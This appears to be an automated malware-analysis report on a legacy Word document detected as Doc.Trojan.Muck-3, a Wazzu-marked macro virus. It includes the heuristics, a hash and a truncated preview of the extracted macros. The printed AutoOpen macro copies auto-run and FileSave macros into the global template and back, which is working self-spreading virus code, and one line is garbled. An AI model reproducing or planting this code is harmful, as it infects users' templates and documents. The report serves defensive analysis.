Verdict: MALICIOUS
Risk Score: 260
Malware Insights
MITRE ATT&CK: T1059.005 Visual Basic
The file contains legacy WordBasic macro virus markers and VBA macros, including AutoOpen and AutoClose, which are indicative of older malware attempting to infect templates. The script attempts to copy these macros to the global template, suggesting an intent to achieve persistence and potentially spread to other documents. The presence of 'Wazzu' as a marker further supports the legacy macro virus classification.
Heuristics (5)
- ClamAV: Doc.Trojan.Muck-3 [critical] (CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Trojan.Muck-3
- Legacy WordBasic macro-virus markers [high] (OLE_LEGACY_WORDBASIC_MACRO_VIRUS): OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
- VBA macros detected [medium, 2 related findings] (OLE_VBA_MACROS): Document contains VBA macro code
- AutoOpen macro [high] (OLE_VBA_AUTOOPEN): AutoOpen macro
- Auto_Close macro [high] (OLE_VBA_AUTOCLOSE): Auto_Close macro
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 5687 bytes |

SHA-256: 056cdafe071f4217d7752e84ffe87c1cb0d6adba751e232947eaf089d5dfc1b2
Detection: ClamAV: Doc.Trojan.Muck-3
Obfuscation or payload: unlikely
Preview script (first 1,000 lines of the extracted script)
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "AutoOpen"
Public Sub MAIN()
Attribute MAIN.VB_Description = "Wazzu Virus Protection. Used to install the Autoexec macro."
Attribute MAIN.VB_ProcData.VB_Invoke_Func = "TemplateProject.AutoOpen.MAIN"
Dim ExecuteOnly
On Error Resume Next
WordBasic.MacroCopy WordBasic.[FileName$]() + ":AutoOpen", "Global:AutoOpen", ExecuteOnly
WordBasic.MacroCopy WordBasic.[FileName$]() + ":AutoClose", "Global:AutoClose", ExecuteOnly
WordBasic.MacroCopy WordBasic.[FileName$]() + ":AutoNew", "Global:AutoNew", ExecuteOnly
WordBasic.MacroCopy WordBasic.[FileName$]() + ":AutoExit", "Global:AutoExit", ExecuteOnly
WordBasic.MacroCopy WordBasic.[FileName$]() + ":FileSave", "Global:FileSave", ExecuteOnly
WordBasic.MacroCopy WordBasic.[FileName$]() + ":FileSaveAs", "Global:FileSaveAs", ExecuteOnly
WordBasic.MacroCopy "Global:AutoOpen", WordBasic.[FileName$]() + ":AutoOpen", ExecuteOnly
WordBasic.MacroCopy "Global:AutoClose", WordBasic.[FileName$]() + ":AutoClose", ExecuteOnly
WordBasic.MacroCopy "Global:AutoNew", WordBasic.[FileName$]() + ":AutoNew", ExecuteOnly
WordBasic.MacroCopy "Global:AutoExit", WordBasic.[FileName$]() + ":AutoExit", ExecuteOnly
WordBasic.MacroCopy "Global:FileSave", WordBasic.[FileName$]() + ":FileSave", ExecuteOnly
WordBasic.MacroCopy "Global:FileSaveAs", WordBasic.[FileName$]() + ":FileSaveAs", ExecuteOnly
WordBasic.FileSaveAll 1
End Sub
Attribute VB_Name = "AutoClose"
Public Sub MAIN()
Attribute MAIN.VB_Description = "Installed to your NORMAL template as AutoClose to clean the prank macros from any documents that you open then close."
Attribute MAIN.VB_ProcData.VB_Invoke_Func = "TemplateProject.AutoClose.MAIN"
End Sub
Attribute VB_Name = "AutoNew"
Public Sub MAIN()
Attribute MAIN.VB_Description = "When creating a new document this macro shows the IMI toolbar, maximizes the document, and zooms to fit page width."
Attribute MAIN.VB_ProcData.VB_Invoke_Func = "TemplateProject.AutoNew.MAIN"
Dim IsThereAnIni$
Dim Win$
Dim Platform$
Dim TitleBox$
Dim Copyright$
Dim StartupScreen$
Dim x
Dim Checked
Rem MAXIMIZE And SHOW TOOLBAR
UM DRRmemorWordBasic.ViewToolbars Toolbar:="IMI", Show:=1
WordBasic.DocMaximize 1
WordBasic.ViewZoom AutoFit:=1
On Error Resume Next
Rem MAKE INFOMAP.INI If IT DOES Not EXIST
IsThereAnIni$ = WordBasic.[GetPrivateProfileString$]("Word6", "StartupScreen", "InfoMap.ini")
If IsThereAnIni$ = "" Then WordBasic.SetPrivateProfileString "Word6", "StartupScreen", "On", "InfoMap.ini"
Rem DETERMINE PLATFORM For VERSION DISPLAY
Win$ = WordBasic.[GetSystemInfo$](21)
If Win$ = "Windows" Then Platform$ = "Windows" Else Platform$ = "Macintosh"
TitleBox$ = "Version 1.2 for " + Platform$
Copyright$ = "© 1994, Information Mapping, Inc., Waltham, MA. All rights reserved."
Rem SET UP DIALOG BOX
WordBasic.BeginDialog 590, 269, TitleBox$
WordBasic.Picture 13, 6, 567, 211, "LOGO", 1, "Picture1"
WordBasic.Text 19, 251, 550, 13, Copyright$, "Text1"
WordBasic.OKButton 416, 218, 88, 21
WordBasic.CheckBox 25, 224, 236, 16, "Disable this startup screen.", "CheckBox1"
WordBasic.EndDialog
Dim dlg As Object: Set dlg = WordBasic.CurValues.UserDialog
WordBasic.CurValues.UserDialog dlg
StartupScreen$ = WordBasic.[GetPrivateProfileString$]("Word6", "StartupScreen", "InfoMap.ini")
If StartupScreen$ = "On" Then x = WordBasic.Dialog.UserDialog(dlg)
Checked = dlg.CheckBox1
If Checked = 1 Then WordBasic.SetPrivateProfileString "Word6", "StartupScreen", "Off", "InfoMap.ini"
End Sub
Attribute VB_Name = "FileSave"
Public Sub MAIN()
Attribute MAIN.VB_Description = "Saves the active document or template"
Attribute MAIN.VB_ProcData.VB_Invoke_Func = "TemplateProject.FileSave.MAIN"
Dim ExecuteOnly
On Error Resume Next
WordBasic.FileSave
WordBasic.FileSa
... (truncated)